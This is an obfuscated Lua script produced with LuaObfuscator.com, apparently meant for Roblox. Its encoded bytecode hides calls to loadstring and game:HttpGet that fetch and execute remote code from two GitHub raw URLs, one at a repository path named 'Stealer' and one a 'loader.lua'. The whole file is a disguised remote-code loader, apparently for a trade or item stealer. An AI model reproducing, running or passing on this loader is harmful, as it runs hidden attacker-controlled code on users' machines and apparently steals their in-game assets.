--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v125=0;local v126;while true do if (v125==1) then return v126;end if (v125==0) then v126=v5(v88,v19);v19=nil;v125=1;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(878 -(282 + 595)))) + (620 -((2192 -(1523 + 114)) + 64)))) ;return v89-(v89%(932 -(857 + 74))) ;else local v90=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v90 + v90))>=v90) and (1 + 0 + 0)) or ((0 -0) + 0) ;end end local function v21() local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -((343 -(32 + 85)) + 1044)) ;v34=4 -3 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -(0 -0) ;local v45=(v20(v43,351 -(87 + 263) ,200 -(67 + 67 + 46) ) * ((2 + (0 -0))^32)) + v42 ;local v46=v20(v43,21 + 0 ,75 -44 );local v47=((v20(v43,24 + 8 )==(3 -2)) and  -(3 -2)) or (443 -(416 + 26)) ;if (v46==(952 -(802 + 150))) then if (v45==(0 -(0 -0))) then return v47 * (0 -(859 -(814 + 45))) ;else v46=1 + 0 ;v44=997 -(915 + 82) ;end elseif (v46==(5796 -3749)) then return ((v45==(0 + (0 -0))) and (v47 * ((1 -(0 + 0))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -2)^(1190 -(116 + 1022))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(886 -(261 + 624)) );v18=v18 + v48 ;local v50={};for v67=1 -0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 675 -(534 + 141) ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91== #"!") then if (v92== #">") then v93=(function() return v94()~=(0 + 0) ;end)();elseif (v92==(1 + 1)) then v93=(function() return v95();end)();elseif (v92== #"-19") then v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if ((0 -0)==v91) then local v123=(function() return 0 + 0 ;end)();local v124=(function() return;end)();while true do if (v123~=(0 + 0)) then else v124=(function() return 0;end)();while true do if (v124~=(1 + 0)) then else v91=(function() return  #"~";end)();break;end if (v124==0) then v92=(function() return v94();end)();v93=(function() return nil;end)();v124=(function() return 1 -0 ;end)();end end break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0 -0 ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do local v117=(function() return 0 -0 ;end)();while true do if (v117==(0 + 0)) then if ((1 + 0)==v108) then local v127=(function() return 396 -(115 + 281) ;end)();while true do if (v127~=(0 + 0)) then else local v150=(function() return 0 -0 ;end)();while true do if (v150~=(0 + 0)) then else while true do if (v99~=(0 -0)) then else v100=(function() return v101();end)();if (v102(v100, #"[", #",")~=(290 -(60 + 230))) then else local v185=(function() return 0 -0 ;end)();local v186=(function() return;end)();local v187=(function() return;end)();local v188=(function() return;end)();while true do if (v185==(870 -(550 + 317))) then if (v102(v187, #"-19", #"gha")~= #" ") then else v188[ #"0313"]=(function() return v105[v188[ #"?id="]];end)();end v106[v107]=(function() return v188;end)();break;end if (v185==(0 -0)) then local v190=(function() return 0;end)();while true do if (v190==0) then v186=(function() return v102(v100,2 -0 , #"91(");end)();v187=(function() return v102(v100, #"0836",16 -10 );end)();v190=(function() return 1457 -(282 + 1174) ;end)();end if ((286 -(134 + 151))~=v190) then else v185=(function() return 1;end)();break;end end end if (v185==(1666 -(970 + 695))) then local v191=(function() return 0;end)();while true do if (v191==(811 -(569 + 242))) then v188=(function() return {v103(),v103(),nil,nil};end)();if (v186==(0 -0)) then local v195=(function() return 0;end)();while true do if (v195==(1990 -(582 + 1408))) then v188[ #"19("]=(function() return v103();end)();v188[ #"0836"]=(function() return v103();end)();break;end end elseif (v186== #"}") then v188[ #"xxx"]=(function() return v104();end)();elseif (v186==(1 + 1)) then v188[ #"xnx"]=(function() return v104() -(2^(55 -39)) ;end)();elseif (v186== #"19(") then local v200=(function() return 0 -0 ;end)();local v201=(function() return;end)();while true do if ((0 -0)==v200) then v201=(function() return 1824 -(1195 + 629) ;end)();while true do if (v201~=(0 -0)) then else v188[ #"19("]=(function() return v104() -((2 + 0)^(716 -(271 + 429))) ;end)();v188[ #"?id="]=(function() return v103();end)();break;end end break;end end end v191=(function() return 1 + 0 ;end)();end if (v191==(1501 -(1408 + 92))) then v185=(function() return 2 -0 ;end)();break;end end end if ((243 -(187 + 54))==v185) then if (v102(v187, #">", #"/")~= #"}") then else v188[2]=(function() return v105[v188[2]];end)();end if (v102(v187,782 -(162 + 618) ,2 + 0 )~= #",") then else v188[ #"gha"]=(function() return v105[v188[ #"-19"]];end)();end v185=(function() return 1291 -(993 + 295) ;end)();end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end if (v108==(0 + 0)) then local v128=(function() return 0 -0 ;end)();while true do if ((1 -0)==v128) then v108=(function() return 1 + 0 ;end)();break;end if (v128~=(0 + 0)) then else v99=(function() return 0;end)();v100=(function() return nil;end)();v128=(function() return 1637 -(1373 + 263) ;end)();end end end break;end end end end;end)();local v53=(function() return function(v109,v110,v111) local v112=(function() return 529 -(406 + 123) ;end)();local v113=(function() return;end)();while true do if (v112==(1000 -(451 + 549))) then v113=(function() return 1769 -(1749 + 20) ;end)();while true do if ((0 + 0)==v113) then local v129=(function() return 0;end)();local v130=(function() return;end)();while true do if (v129==0) then v130=(function() return 1322 -(1249 + 73) ;end)();while true do if (v130==(0 -0)) then local v173=(function() return 0 -0 ;end)();while true do if (v173~=(1384 -(746 + 638))) then else v109[v110-#"\\" ]=(function() return v111();end)();return v109,v110,v111;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #" ",v58 do FlatIdent_7366E,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_7366E,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"91("]=(function() return v21();end)();for v70= #"}",v23() do FlatIdent_7DD24,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_7DD24,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #"/",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[(1132 -(369 + 761)) -1 ];local v65=v61[2];local v66=v61[8 -5 ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1901 -(106 + 1794) ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(2 -1) ;local v81={};local v82={};for v114=0 -0 ,v80 do if ((4255>=55) and (4962>1721) and (v114>=v74)) then v78[v114-v74 ]=v79[v114 + (115 -(4 + 110)) ];else v82[v114]=v79[v114 + ((339 + 246) -(57 + 527)) ];end end local v83=(v80-v74) + (1428 -((74 -33) + (2625 -1239))) ;local v84;local v85;while true do v84=v72[v76];v85=v84[104 -(17 + 86) ];if (v85<=(7 + 2)) then if (v85<=(8 -4)) then if (v85<=(2 -1)) then if ((2999>1156) and (v85==(166 -(122 + 44)))) then local v131=v84[2 -0 ];local v132,v133=v75(v82[v131](v13(v82,v131 + 1 ,v84[9 -6 ])));v77=(v133 + v131) -((239 -(64 + 174)) + 0) ;local v134=0;for v151=v131,v77 do v134=v134 + 1 + 0 ;v82[v151]=v132[v134];end else v82[v84[3 -1 ]]=v84[68 -(30 + 35) ];end elseif ((802<=4833) and (v85<=(1 + 1 + 0))) then do return;end elseif (v85>(1260 -(1043 + 214))) then if ((2087==2087) and (v82[v84[7 -5 ]]==v84[1216 -(323 + 889) ])) then v76=v76 + (2 -1) ;else v76=v84[583 -(361 + 219) ];end else v76=v84[3];end elseif (v85<=(326 -(53 + 267))) then if (v85==(2 + 3)) then local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==(414 -((22 -7) + 398))) then v77=(v140 + v138) -(983 -((354 -(144 + 192)) + (1180 -(42 + 174)))) ;v141=0 -0 ;v137=2 + 0 ;end if (0==v137) then v138=v84[2];v139,v140=v75(v82[v138](v13(v82,v138 + 1 + 0 + 0 ,v84[853 -(20 + 830) ])));v137=1;end if (v137==(2 + 0)) then for v175=v138,v77 do v141=v141 + ((106 + 21) -(116 + 10)) ;v82[v175]=v139[v141];end break;end end else v82[v84[2]]();end elseif ((2350>1155) and (v85<=(1 + 0 + 6))) then v82[v84[1506 -(363 + 1141) ]]=v63[v84[741 -((2122 -(1183 + 397)) + 196) ]];elseif ((v85>(17 -9)) or (4445<4149)) then v76=v84[(2 -1) + 2 ];else local v160=v84[2];v82[v160]=v82[v160](v13(v82,v160 + 1 + 0 ,v77));end elseif ((v85<=(6 + 8)) or (1818==85)) then if (v85<=(28 -17)) then if ((4029<=4853) and (v85>((19 + 6) -15))) then for v154=v84[1553 -(1126 + 425) ],v84[3] do v82[v154]=nil;end else for v156=v84[407 -(118 + 287) ],v84[11 -8 ] do v82[v156]=nil;end end elseif (((630<2127) and (v85<=(1133 -(118 + 1003)))) or (516>3434)) then v82[v84[5 -3 ]]=v84[380 -(142 + 176 + 59) ];elseif ((4046>=3033) and (v85>(58 -45))) then local v162=0 + 0 ;local v163;local v164;while true do if ((v162==(977 -(553 + 424))) or (2719<=1447)) then v163=v84[3 -1 ];v164=v82[v84[3]];v162=1 + 0 ;end if (((1 + 0)==v162) or (4134<3926)) then v82[v163 + (1976 -(1913 + 62)) + 0 ]=v164;v82[v163]=v164[v84[4]];break;end end elseif ((v82[v84[2]]==v84[2 + 2 ]) or (164>=2785)) then v76=v76 + 1 + 0 ;else v76=v84[6 -3 ];end elseif (v85<=(44 -28)) then if ((v85==(33 -18)) or (1938==2514) or (525==2109)) then do return;end else local v146=0 + 0 ;local v147;while true do if ((33==33) and (v146==(0 -0))) then v147=v84[755 -(239 + 514) ];v82[v147]=v82[v147](v13(v82,v147 + 1 + 0 ,v77));break;end end end elseif (v85<=(1346 -(797 + 532))) then v82[v84[2]]=v63[v84[3]];elseif (v85==(14 + 4)) then v82[v84[2]]();else local v165=v84[1 + 1 ];local v166=v82[v84[6 -3 ]];v82[v165 + (1203 -(373 + 829)) ]=v166;v82[v165]=v166[v84[735 -(476 + 255) ]];end v76=v76 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5461646173682D31302F537465616C65722F6D61696E2F547261646503443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F523354482D505249562F52335448505249562F6D61696E2F6C6F616465722E6C7561001A3O0012013O00014O000A000100013O0026043O0002000100010004093O00020001001201000100013O00260400010005000100010004093O00050001001207000200023O001207000300033O00200E000300030004001201000500054O0005000300054O001000023O00022O0012000200010001001207000200023O001207000300033O00200E000300030004001201000500064O0005000300054O001000023O00022O00120002000100010004093O001900010004093O000500010004093O001900010004093O000200012O000F3O00017O00",v9(),...);
